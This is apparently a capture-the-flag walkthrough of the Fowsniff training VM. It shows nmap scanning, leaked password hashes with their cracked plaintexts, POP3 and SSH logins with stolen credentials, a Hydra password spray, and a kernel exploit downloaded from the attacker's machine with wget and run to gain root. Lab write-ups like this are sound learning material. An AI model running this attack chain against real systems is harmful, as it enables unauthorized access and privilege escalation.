BACK
root@kali:~#
root@kali:~/Documents/Fowsniff#
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)
Dear All,
A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.
We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.
This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via
the SSH protocol.
The temporary password for SSH is
root@kali:~/Documents/Fowsniff#
My Kali machine (local):
root@kali:~/exploit_tools/tmp#
________ ________ ___ __ ________ ________ ___ ________ ________
|\ _____\\ __ \|\ \ |\ \|\ ____\|\ ___ \|\ \|\ _____\\ _____\
\ \ \__/\ \ \|\ \ \ \ \ \ \ \ \___|\ \ \\ \ \ \ \ \ \__/\ \ \__/
\ \ __\\ \ \\\ \ \ \ __\ \ \ \_____ \ \ \\ \ \ \ \ \ __\\ \ __\
\ \ \_| \ \ \\\ \ \ \|\__\_\ \|____|\ \ \ \\ \ \ \ \ \ \_| \ \ \_|
\ \__\ \ \_______\ \____________\____\_\ \ \__\\ \__\ \__\ \__\ \ \__\
\|__| \|_______|\|____________|\_________\|__| \|__|\|__|\|__| \|__|
\|_________|
Target IP: 10.0.2.16
by sc00by
##########
NMAP Scan:
##########
root@kali:~# nmap -sS 10.0.2.16
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 14:08 EST
Nmap scan report for 10.0.2.16
Host is up (0.00031s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
143/tcp open imap
MAC Address: 08:00:27:66:85:17 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
[~!~] Ok so there's a web server and two different mail servers,
which I imagine will be a plane of attack.
########################
Checking the web server:
########################
[~!~] Apparantly their company twitter, @fowsniffcorp, was pwned
by some hackers.
######################
Twitter investigation:
######################
[~!~] Oh boy, they left a dump of presumably some accounts/passwords...
Dump URL: https://pastebin.com/NrAqVeeX
[~!~] Compromised creds:
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e
[~!~] According to the hackers:
"They left their pop3 server WIDE OPEN, too!
MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P"
#######################
Cracking the passwords:
#######################
mauer : 8a28a94a588a95b80163709ab4313aa4 MD5 : mailcall
mustikka : ae1644dac5b77c0cf51e0d26ad6d7e56 MD5 : bilbo101
tegel : 1dc352435fecca338acfd4be10984009 MD5 : apples01
baksteen : 19f5af754c31f1e2651edde9250d69bb MD5 : skyler22
seina : 90dc16d47114aa13671c697fd506cf26 MD5 : scoobydoo2
stone : a92b8a29ef1183192e3d35187e0cfabd [Not found]
mursten : 0e9588cb62f4b6f27e33d449e2ba0b3b MD5 : carp4ever
parede : 4d6e42f56e127803285a0a7649b5ab11 MD5 : orlando12
sciana : f7fd98d380735e859f8b2ffbbede5a7e MD5 : 07011972
##############################
Checking the pop3 mail server:
##############################
root@kali:~/Documents/Fowsniff# telnet 10.0.2.16 pop3
Trying 10.0.2.16...
Connected to 10.0.2.16.
Escape character is '^]'.
+OK Welcome to the Fowsniff Corporate Mail Server!
...tried other users, none worked...
user seina
+OK
pass scoobydoo2
+OK Logged in.
list
+OK 2 messages:
1 1622
2 1280
.
retr 1
+OK 1622 octets
Return-Path: "S1ck3nBluff+secureshell"
You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.
Come see me in my office at your earliest convenience and we'll set it up.
Thanks,
A.J Stone
[~!~] This email has some juicy information, including
a temporary SSH password: S1ck3nBluff+secureshell
[~!~] The other email explained that seina was out sick
from work on the day the security team came in and
made everyone change their password, which is why
none of the other credentials worked.
#########################
Attempt to get in to SSH:
#########################
root@kali:~/Documents/Fowsniff# hydra -t 4 -L users.txt -p S1ck3nBluff+secureshell 10.0.2.16 ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2019-02-18 14:51:33
[DATA] max 4 tasks per 1 server, overall 4 tasks, 9 login tries (l:9/p:1), ~3 tries per task
[DATA] attacking ssh://10.0.2.16:22/
[22][ssh] host: 10.0.2.16 login: baksteen password: S1ck3nBluff+secureshell
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-02-18 14:51:37
[~!~] Looks like user 'baksteen' is the only one
that still has that temporary password
still in play.
root@kali:~/Documents/Fowsniff# ssh baksteen@10.0.2.16
baksteen@10.0.2.16's password:
_____ _ __ __
:sdddddddddddddddy+ | ___|____ _____ _ __ (_)/ _|/ _|
:yNMMMMMMMMMMMMMNmhsso | |_ / _ \ \ /\ / / __| '_ \| | |_| |_
.sdmmmmmNmmmmmmmNdyssssso | _| (_) \ V V /\__ \ | | | | _| _|
-: y. dssssssso |_| \___/ \_/\_/ |___/_| |_|_|_| |_|
-: y. dssssssso ____
-: y. dssssssso / ___|___ _ __ _ __
-: y. dssssssso | | / _ \| '__| '_ \
-: o. dssssssso | |__| (_) | | | |_) | _
-: o. yssssssso \____\___/|_| | .__/ (_)
-: .+mdddddddmyyyyyhy: |_|
-: -odMMMMMMMMMMmhhdy/.
.ohdddddddddddddho: Delivering Solutions
**** Welcome to the Fowsniff Corporate Server! ****
---------- NOTICE: ----------
* Due to the recent security breach, we are running on a very minimal system.
* Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.
New release '18.04.2 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Tue Mar 13 16:55:40 2018 from 192.168.7.36
baksteen@fowsniff:~$
[~!~] And there's our shell! Time to start digging.
#####################
Scanning the Machine:
#####################
[~!~] I decided to host a SimpleHTTPServer with python
in order to enumerate the machine and identify
potential vulnerabilities.
My machine (10.0.2.4):
~~~~~~~~~~~~~~~~~~~~~~
root@kali:~/exploit_tools# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
Target machine:
~~~~~~~~~~~~~~~
baksteen@fowsniff:~$ wget http://10.0.2.4:8080/linux-exploit-suggester/linux-exploit-suggester.sh
--2019-02-21 18:02:15-- http://10.0.2.4:8080/linux-exploit-suggester/linux-exploit-suggester.sh
Connecting to 10.0.2.4:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 65668 (64K) [text/x-sh]
Saving to: 'linux-exploit-suggester.sh'
linux-exploit-sugge 100%[==================>] 64.13K --.-KB/s in 0.03s
2019-02-21 18:02:15 (2.13 MB/s) - 'linux-exploit-suggester.sh' saved [65668/65668]
baksteen@fowsniff:~$ chmod a+x linux-exploit-suggester.sh
baksteen@fowsniff:~$ ./linux-exploit-suggester.sh
Available information:
Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version:
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
70 kernel space exploits
32 user space exploits
...
[+] [CVE-2016-8655] chocobo_root
Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
Download URL: https://www.exploit-db.com/download/40871
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
...
[~!~] I attempted to use the 'chocobo_root' exploit,
but the exploit depended upon a certain offset
which the author did not have for the specific
kernel version. I should have ran `uname -a`
before going through all the trouble to set it
up, then I would have known my kernel version
more specifically:
4.4.0-116-generic #140
NOTE: Fowsniff does not have a gcc or g++ compiler :[
But we can just compile on our Kali machine and host
a SimpleHTTPServer like before and transfer the executable
over to the victim machine.
#########
Research:
#########
[~!~] None of the other exploits suggested by les
looked very well tuned to our machine, so I
did a quick search for our specific kernel
version and uncovered an exploit that looked
much more tuned to our needs:
https://www.exploit-db.com/exploits/44298
############
The exploit:
############
My Kali machine (local):
root@kali:~/exploit_tools/tmp# wget https://www.exploit-db.com/raw/44298
--2019-02-21 21:23:14-- https://www.exploit-db.com/raw/44298
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6021 (5.9K) [text/plain]
Saving to: '44298'
44298 100%[=========================>] 5.88K --.-KB/s in 0s
2019-02-21 21:23:15 (143 MB/s) - '44298' saved [6021/6021]
root@kali:~/exploit_tools/tmp# mv 44298 44298.c
root@kali:~/exploit_tools/tmp# gcc 44298.c
root@kali:~/exploit_tools/tmp# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
Target machine:
baksteen@fowsniff:~$ wget http://10.0.2.4:8080/a.out
--2019-02-21 21:25:17-- http://10.0.2.4:8080/a.out
Connecting to 10.0.2.4:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17880 (17K) [application/octet-stream]
Saving to: 'a.out'
a.out 100%[==================>] 17.46K --.-KB/s in 0s
2019-02-21 21:25:17 (234 MB/s) - 'a.out' saved [17880/17880]
baksteen@fowsniff:~$ chmod a+x a.out
baksteen@fowsniff:~$ ./a.out
task_struct = ffff880016790000
uidptr = ffff880018acc604
spawning root shell
root@fowsniff:~# whoami
root
root@fowsniff:~# sc00by owns Fowsniff!
[~!~] And there it is! A root shell!
Now let's capture the flag :)
root@fowsniff:~# cd /root
root@fowsniff:/root# ls
flag.txt Maildir
root@fowsniff:/root# cat flag.txt
___ _ _ _ _ _
/ __|___ _ _ __ _ _ _ __ _| |_ _ _| |__ _| |_(_)___ _ _ __| |
| (__/ _ \ ' \/ _` | '_/ _` | _| || | / _` | _| / _ \ ' \(_-<_|
\___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)
|___/
(_)
|--------------
|&&&&&&&&&&&&&&|
| R O O T |
| F L A G |
|&&&&&&&&&&&&&&|
|--------------
|
|
|
|
|
|
---
Nice work!
This CTF was built with love in every byte by @berzerk0 on Twitter.
Special thanks to psf, @nbulischeck and the whole Fofao Team.
root@fowsniff:/root#
[~!~] All in all a very fun, stress-free machine.
I learned a lot about using python's
SimpleHTTPServer for easy, quick transportation
of files between machines.
Have a nice day!
-sc00by
BACK